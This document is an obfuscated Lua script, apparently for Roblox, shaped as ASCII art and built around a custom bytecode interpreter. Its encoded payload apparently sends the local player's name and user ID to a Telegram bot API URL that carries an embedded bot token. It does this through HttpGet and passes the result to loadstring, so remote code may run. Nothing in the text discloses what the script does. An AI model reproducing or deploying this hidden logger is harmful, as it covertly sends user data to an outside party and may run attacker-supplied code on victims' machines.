                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));   
                                                    return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16) 
                                                  );if v19 then local v109=0;local v110;while true do if (v109==1) then return v110;end if (v109==0 
                                                  ) then v110=v5(v84,v19);v19=nil;v109=1;end end else return v84;end break;end end end end);local     
                                                function v20(v31,v32,v33) if v33 then local v85=(v31/(((1 + 4) -3)^(v32-((879 -(282 + 595)) -1))))%((3  
                                                -1)^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v85-(v85%(620 -(555 + 64))) ;else local v86=(933 -(857 + 74))^ 
                                              (v32-(569 -(367 + 201))) ;return (((v31%(v86 + v86))>=v86) and (928 -(214 + 713))) or (0 + 0) ;end end local  
                                              function v21() local v34=0;local v35;while true do if (v34==(1637 -((2588 -(68 + 997)) + 114))) then v35=v1(  
                                            v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 -0 ;end if (v34==1) then return v35;end end end local function v22() local    
                                            v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v37 * (373 -(32 + 85))) + v36 ;end local  
                                          function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) + 0 );v18=v18 + 1 + (4 -1) ;return (v41 * (16778173 -((    
                                          1242 -(87 + 263)) + 65))) + (v40 * (156337 -90801)) + (v39 * 256) + v38 ;end local function v24() local v42=442 -(416 +   
                                          26) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==3) then if (v47==0) then if (v46==( 
                                          180 -(67 + (360 -247)))) then return v48 * (0 + 0 + 0) ;else v47=2 -1 ;v45=0 + 0 ;end elseif (v47==(8135 -(10771 -4683)))   
                                        then return ((v46==((1390 -(145 + 293)) -((1232 -(44 + 386)) + 150))) and (v48 * ((2 -(1487 -(998 + 488)))/((0 + 0) -0)))) or ( 
                                        v48 * NaN) ;end return v8(v48,v47-(745 + 278) ) * (v45 + (v46/((999 - --[[==============================]](915 + 82))^(147 -95))) 
                                        ) ;end if (v42==1) then v45=1 + 0 ;v46=(v20(v44,1 -0 ,(989  --[[============================================]]+ 218) -(1069 + 118 
                                        ) ) * (2^(72 -40))) + v43 ;v42=(775 -(201 + 571)) -1 ;  --[[======================================================]]end if (v42==(1 
                                       + 1)) then v47=v20(v44,37 -16 ,31 + 0 );v48=((v20(   --[[==========================================================]]v44,32)==(792 -(  
                                      368 + 423))) and  -(3 -2)) or 1 ;v42=1141 -(116 +   --[[==============================================================]]1022) ;end if ( 
                                      v42==(18 -(10 + 8))) then v43=v23();v44=v23();v42=3 --[[================================================================]] -2 ;end end    
                                      end local function v25(v49) local v50;if  not v49   --[[==================================================================]]then local    
                                      v87=0 -0 ;while true do if (v87==0) then v49=v23(); --[[==================================================================]]if (v49==(0 + 0   
                                    )) then return "";end break;end end end v50=v3(v16,   --[[====================================================================]]v18,(v18 +    
                    v49) -(3 -(861 -(814 + 45))) );v18=v18 + v49 ;local v51={};for v66=3  --[[====================================================================]]-2 , #v50 do    
              v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local --[[======================================================================]] function v27 
            (...) return {...},v12("#",...);end local function v28() local v52=(function( --[[======================================================================]]) return 1665 
           -(970 + 695) ;end)();local v53=(function() return;end)();local v54=(function() --[[======================================================================]] return;end)( 
        );local v55=(function() return;end)();local v56=(function() return;end)();local   --[[======================================================================]]v57=(function 
        () return;end)();local v58=(function() return;end)();local v59=(function() return --[[======================================================================]];end)();while 
       true do if (v52==(1 -0)) then local v90=(function() return 0;end)();local v91=(    --[[======================================================================]]function()    
      return;end)();while true do if (v90~=0) then else v91=(function() return 0;end)();    --[[==================================================================]]while true do   
      if ((1990 -(582 + 1408))==v91) then v56=(function() return {};end)();v57=(function()  --[[================================================================]]return {v54,v55,  
    nil,v56};end)();v91=(function() return 3 -2 ;end)();end if (v91==(1 -0)) then v58=(     --[[==============================================================]]function() return 
     v23();end)();v52=(function() return 7 -5 ;end)();break;end end break;end end end if (v52 --[[==========================================================]]==(1824 -(1195 +    
    629))) then local v92=(function() return 0;end)();while true do if (v92==1) then v55=(      --[[====================================================]]function() return {};   
    end)();v52=(function() return 1 -0 ;end)();break;end if (v92==(241 -(187 + 54))) then v53=(   --[[==============================================]]function() return         
    function(v116,v117,v118) local v119=(function() return 780 -(162 + 618) ;end)();local v120=(      --[[====================================]]function() return;end)();     
    while true do if (v119==(0 + 0)) then v120=(function() return 0 + 0 ;end)();while true do if (v120~=( --[[========================]]0 -0)) then else v116[v117-#"[" ]=(   
    function() return v118();end)();return v116,v117,v118;end end break;end end end;end)();v54=(function() return {};end)();v92=(function() return 1;end)();end end end if  
  (v52~=3) then else for v94= #"!",v23() do local v95=(function() return v21();end)();if (v20(v95, #",", #"~")~=(0 -0)) then else local v103=(function() return 0;end)(); 
  local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if  
  (v103==1) then v106=(function() return nil;end)();v107=(function() return nil;end)();v103=(function() return 2;end)();end if (v103==(0 + 0)) then local v121=(function( 
  ) return 0;end)();while true do if (0~=v121) then else v104=(function() return 1636 -(1373 + 263) ;end)();v105=(function() return nil;end)();v121=(function() return 1; 
  end)();end if (v121~=(1001 -(451 + 549))) then else v103=(function() return 1 + 0 ;end)();break;end end end if (v103~=(2 -0)) then else while true do if (v104~= #"}")  
  then else local v132=(function() return 0;end)();local v133=(function() return;end)();while true do if (v132==(0 -0)) then v133=(function() return 0;end)();while true  
  do if (v133==(1384 -(746 + 638))) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 + 0)) then local v235=(function() return 0 -0 ;end)();local    
  v236=(function() return;end)();while true do if (0~=v235) then else v236=(function() return 341 -(218 + 123) ;end)();while true do if (0==v236) then v107[ #"asd"]=(    
  function() return v22();end)();v107[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"|") then v107[ #"asd"]=(function() return    
  v23();end)();elseif (v105==(1583 -(1535 + 46))) then v107[ #"91("]=(function() return v23() -((2 + 0)^16) ;end)();elseif (v105~= #"xxx") then else local v241=(function 
  () return 0 + 0 ;end)();local v242=(function() return;end)();while true do if (v241~=(560 -(306 + 254))) then else v242=(function() return 0 + 0 ;end)();while true do  
  if (v242~=(0 -0)) then else v107[ #"91("]=(function() return v23() -(2^16) ;end)();v107[ #"0836"]=(function() return v22();end)();break;end end break;end end end v133=(  
  function() return 1468 -(899 + 568) ;end)();end if (v133==1) then v104=(function() return 2 + 0 ;end)();break;end end break;end end end if (v104~= #"xxx") then else if ( 
  v20(v106, #"xnx", #"-19")== #"}") then v107[ #"0836"]=(function() return v59[v107[ #"0313"]];end)();end v54[v94]=(function() return v107;end)();break;end if (v104==2)    
  then local v135=(function() return 0;end)();while true do if (v135==(0 -0)) then if (v20(v106, #",", #"\\")~= #"{") then else v107[2]=(function() return v59[v107[2]];end 
  )();end if (v20(v106,605 -(268 + 335) ,2)~= #"]") then else v107[ #"xxx"]=(function() return v59[v107[ #"xnx"]];end)();end v135=(function() return 291 -(60 + 230) ;end)( 
  );end if (1==v135) then v104=(function() return  #"nil";end)();break;end end end if (v104==(572 -(426 + 146))) then local v136=(function() return 0 + 0 ;end)();local     
  v137=(function() return;end)();while true do if (v136~=(1456 -(282 + 1174))) then else v137=(function() return 0;end)();while true do if ((811 -(569 + 242))==v137) then  
  v105=(function() return v20(v95,2, #"19(");end)();v106=(function() return v20(v95, #"?id=",6);end)();v137=(function() return 2 -1 ;end)();end if (v137==1) then v104=(    
  function() return  #"!";end)();break;end end break;end end end end break;end end end end for v96= #"|",v23() do v55,v96,v28=(function() return v53(v55,v96,v28);end)();   
  end return v57;end if (v52==(1 + 1)) then local v93=(function() return 1024 -(706 + 318) ;end)();while true do if (v93==0) then v59=(function() return {};end)();for v111 
  = #",",v58 do local v112=(function() return 0;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while 
   true do if (0~=v112) then else local v122=(function() return 1251 -(721 + 530) ;end)();while true do if (v122==(1271 -(945 + 326))) then v113=(function() return 0 -0 ;  
  end)();v114=(function() return nil;end)();v122=(function() return 1;end)();end if (v122~=1) then else v112=(function() return 1;end)();break;end end end if (v112==(1 + 0 
  )) then v115=(function() return nil;end)();while true do if ((700 -(271 + 429))==v113) then local v138=(function() return 0 + 0 ;end)();local v139=(function() return;  
  end)();while true do if (0~=v138) then else v139=(function() return 1500 -(1408 + 92) ;end)();while true do if (v139~=1) then else v113=(function() return 1;end)();    
  break;end if (v139==(1086 -(461 + 625))) then v114=(function() return v21();end)();v115=(function() return nil;end)();v139=(function() return 1;end)();end end break;   
    end end end if (v113==(1289 -(993 + 295))) then if (v114== #"|") then v115=(function() return v21()~=(0 + 0) ;end)();elseif (v114==(1173 -(418 + 753))) then v115=(   
    function() return v24();end)();elseif (v114== #"xnx") then v115=(function() return v25();end)();end v59[v111]=(function() return v115;end)();break;end end break;end  
    end end v93=(function() return 1;end)();end if (v93~=(1 + 0)) then else v57[ #"91("]=(function() return v21();end)();v52=(function() return 3;end)();break;end end    
    end end end local function v29(v60,v61,v62) local v63=v60[(1126 -(936 + 189)) + 0 ];local v64=v60[1 + 1 + 0 ];local v65=v60[1 + 2 ];return function(...) local v68=   
      v63;local v69=v64;local v70=v65;local v71=v27;local v72=530 -(406 + 123) ;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};     
      local v78={};for v88=0 + 0 ,v76 do if ((3693<=4382) and (v88>=v70)) then v74[v88-v70 ]=v75[v88 + (1323 -(1249 + 73)) ];else v78[v88]=v75[v88 + 1 + 0 ];end end    
      local v79=(v76-v70) + ((2759 -(1565 + 48)) -(466 + 420 + 259)) ;local v80;local v81;while true do local v89=0 -0 ;while true do if ((v89==(0 -0)) or (3282>4100)) 
         then v80=v68[v72];v81=v80[1];v89=1901 -(106 + 1794) ;end if ((v89==(1 + 0)) or (3580<2844)) then if ((89<4490) and (v81<=(1143 -(782 + 356)))) then if (v81<=2 
        ) then if ((v81<=((267 -(176 + 91)) + 0)) or (4983<1808)) then v78[v80[5 -3 ]]=v80[7 -4 ];elseif (v81>(115 -(4 + 110))) then local v141=584 -(57 + 527) ;local  
        v142;local v143;while true do if (v141==(1427 -(41 + 1386))) then v142=v80[105 -(17 + (223 -137)) ];v143=v78[v80[3]];v141=1 + 0 ;end if (v141==1) then v78[v142 
           + (1 -0) ]=v143;v78[v142]=v143[v80[5 -1 ]];break;end end else local v144=v80[5 -3 ];local v145,v146=v71(v78[v144](v13(v78,v144 + 1 ,v80[169 -(122 + 44) ]) 
            ));v73=(v146 + v144) -(1093 -(975 + 117)) ;local v147=0;for v182=v144,v73 do v147=v147 + 1 ;v78[v182]=v145[v147];end end elseif ((625==625) and (v81<=(5  
              -2))) then local v125=0 -0 ;local v126;local v127;while true do if (v125==(1 + 0)) then for v194=v126 + 1 + 0 ,v80[4] do v127=v127   .. v78[v194] ;end  
                v78[v80[2]]=v127;break;end if ((588<1692) and (v125==0)) then v126=v80[(1880 -(157 + 1718)) -2 ];v127=v78[v126];v125=1;end end elseif ((3829>3769)    
                  and (v81>(69 -(30 + 35)))) then local v148=v80[2 + 0 + 0 ];v78[v148]=v78[v148](v13(v78,v148 + (1258 -(1043 + 214)) ,v80[3]));else v78[v80[2]]();  
                      end elseif (v81<=((106 -76) -22)) then if (v81<=((4163 -2945) -(323 + 889))) then v78[v80[5 -3 ]]=v62[v80[3]];elseif ((1485<=2904) and (v81== 
                                  7)) then v78[v80[582 -(361 + (1237 -(697 + 321))) ]]=v78[v80[323 -(53 + 267) ]][v80[1 + 3 ]];else local v152=0;local v153;local   
                                      v154;while true do if (v152==(420 -((40 -25) + 398))) then v80=v68[v72];v78[v80[984 -(18 + (2042 -1078)) ]]=v78[v80[11 -8 ]][ 
                                      v80[4]];break;end if ((4269==4269) and (v152==(1 + 0))) then          v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v154= 
                                      v80[2 + 0 ];v153=v78[v80[3]];v152=852 -(20 + 830) ;end if (           v152==(4 + 1)) then v80=v68[v72];v78[v80[2]]=v80[129  
                                      -(116 + 10) ];v72=v72 + 1 + 0 ;v80=v68[v72];v154=v80[740 -(           542 + 196) ];v152=12 -6 ;end if ((387<=2782) and (((2 
                                       + 4)==v152) or (4797<3651))) then v78[v154]=v78[v154](v13(           v78,v154 + (2 -1) + 0 ,v80[2 + 1 ]));v72=v72 + (2 -(1 
                                       + 0)) ;v80=v68[v72];v78[v80[(6 -2) -2 ]]=v78[v80[1554 -((              3018 -1892) + 425) ]][v80[409 -(118 + (1514 -(322 + 
                                       905))) ]];v72=v72 + (3 -2) ;v152=1128 -(118 + 1003) ;end if            ((v152==(0 -0)) or (4177>4850)) then v153=nil;v154= 
                                      nil;v78[v80[379 -(142 + 235) ]]=v62[v80[13 -10 ]];v72=v72 + 1            + 0 ;v80=v68[v72];v152=978 -(553 + 424) ;end if  
                                        (((7 -3)==v152) or (400>1111) or (1899<=917)) then v154=v80           [2 + 0 ];v153=v78[v80[3 + 0 ]];v78[v154 + 1 ]=    
                                        v153;v78[v154]=v153[v80[(614 -(602 + 9)) + 1 ]];v72=v72 + 1              + 0 ;v152=3 + 2 ;end if ((v152==(6 -3)) or (   
                                        4312<=876)) then v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[4 -             2 ]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];   
                                        v152=2 + (1191 -(449 + 740)) ;end if (v152==(9 -7)) then                v78[v154 + (754 -(239 + 514)) ]=v153;v78[v154 
                                        ]=v153[v80[2 + 2 ]];v72=v72 + 1 ;v80=v68[v72];v78[v80[(                   2203 -(826 + 46)) -(797 + 532) ]]=v80[3 + 
                                         0 ];v152=2 + 1 ;end end end elseif ((2232<=2596) and (                   3051>1005) and (v81<=((967 -(245 + 702))  
                                          -11))) then local v130=0;local v131;while true do if (                    v130==((3798 -2596) -(373 + 829)))    
                                          then v131=v80[733 -(476 + 255) ];v78[v131]=v78[v131](                       v13(v78,v131 + 1 ,v73));break;  
                                            end end elseif (v81>(1140 -(369 + 761))) then local                          v155;local v156,v157;    
                                            local v158;local v159;local v160;v78[v80[2 + 0 ]]                                 =v62[v80[(2 
                                               + 3) -2 ]];v72=v72 + (1 -(1898 -(260 + 1638) 
                                                )) ;v80=v68[v72];v160=v80[240 -(64 + 174) 
                                                     ];v159=v78[v80[3]];v78[v160 + 1 +  
                                                          0 ]=v159;v78[v160]=v159 


[v80[(445 -(382 + 58)) -(3 -2) ]];v72=v72 + (337 -(144 + 192)) ;v80=v68[v72];v78[v80[2]]=v80[219 -(42 + 174) ];v72=v72 + 1 + 0 + 0 ;v80=v68[v72];v160=v80[2 + 0 ];v78[v160]=v78[v160](v13(v78,v160 + 1 + 0 ,v80[1507 -(363 + 1141) ]));v72=v72 + 1 ;v80=v68[v72];v78[v80[1582 -(1183 + (820 -423)) ]]=v78[v80[(23 -15) -5 ]][v80[3 + 1 ]];v72=v72 + 1 + 0 ;v80=v68[v72];v78[v80[1977 -(1913 + 62) ]]=v78[v80[2 + 1 ]][v80[4]];v72=v72 + 1 ;v80=v68[v72];v159=v80[7 -4 ];v158=v78[v159];for v190=v159 + 1 ,v80[1937 -(565 + 1368) ] do v158=v158   .. v78[v190] ;end v78[v80[7 -5 ]]=v158;v72=v72 + (1662 -(1477 + (1389 -(902 + 303)))) ;v80=v68[v72];v160=v80[2 -0 ];v156,v157=v71(v78[v160](v13(v78,v160 + (1 -0) ,v80[3 + 0 ])));v73=(v157 + v160) -(857 -(564 + (703 -411))) ;v155=0 -0 ;for v191=v160,v73 do v155=v155 + ((1 + 1) -1) ;v78[v191]=v156[v155];end v72=v72 + (305 -(244 + 60)) ;v80=v68[v72];v160=v80[2 + 0 ];v78[v160]=v78[v160](v13(v78,v160 + (477 -(41 + 435)) ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[1003 -(938 + 63) ]]();else do return;end end v72=v72 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403733O00682O7470733A2O2F6170692E74656C656772616D2E6F72672F626F743731333635393O35323A2O4145316B58533466613073684D4E6E49626B413750794D67314E70725165643678492F73656E644D652O736167653F636861745F69643D2D312O303138373632363334383926746578743D030A3O004765745365727669636503073O00506C6179657273030B3O004C6F63616C506C6179657203043O004E616D6503023O00282903063O0055736572496400163O0012083O00013O00122O000100023O00202O00010001000300122O000300043O00122O000400023O00202O00040004000500122O000600066O00040006000200202O00040004000700202O00040004000800122O000500093O00120B000600023O00202O00060006000500122O000800066O00060008000200202O00060006000700202O00060006000A4O0003000300064O000100039O0000026O000100012O000A3O00017O00",v9(),...);
